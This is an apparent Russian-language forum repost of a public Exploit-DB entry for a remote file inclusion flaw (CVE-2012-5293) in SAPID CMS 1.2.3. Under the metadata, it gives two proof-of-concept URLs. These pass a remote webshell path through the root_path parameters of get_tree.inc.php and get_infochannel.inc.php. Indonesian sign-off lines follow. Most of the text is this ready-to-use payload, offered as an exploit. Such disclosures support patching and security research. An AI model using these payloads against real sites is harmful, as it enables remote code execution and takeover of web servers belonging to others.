Exploit SAPID 1.2.3 Stable - Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
18342
Проверка EDB
  1. Пройдено
Автор
OPA YONG
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2012-5293
Дата публикации
2012-01-09
Код:
# Exploit Title: SAPID Stable (RFI)
# Google Dork: tanyakan pada dan pemula :D
# Date: January 08 2011
# Author: Opa Yong
# Software Link: http://sourceforge.net/projects/sapid/files/sapid-cms/
# Version: SAPID 1.2.3 Stable
# Tested on: Windows XP Home Edition SP2


@POC: http://127.0.1/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=[webshell.txt?]
@POC: http://127.0.1/usr/extensions/get_infochannel.inc.php?root_path=[webshell.txt?]


Pesan: Jangan pernah mengaku diri anda hacker,lebih baik orang yg di sekitar anda yg mengaku anda itu adalah hacker.


Special thanks for Dan Pemula
 
Источник
www.exploit-db.com

Похожие темы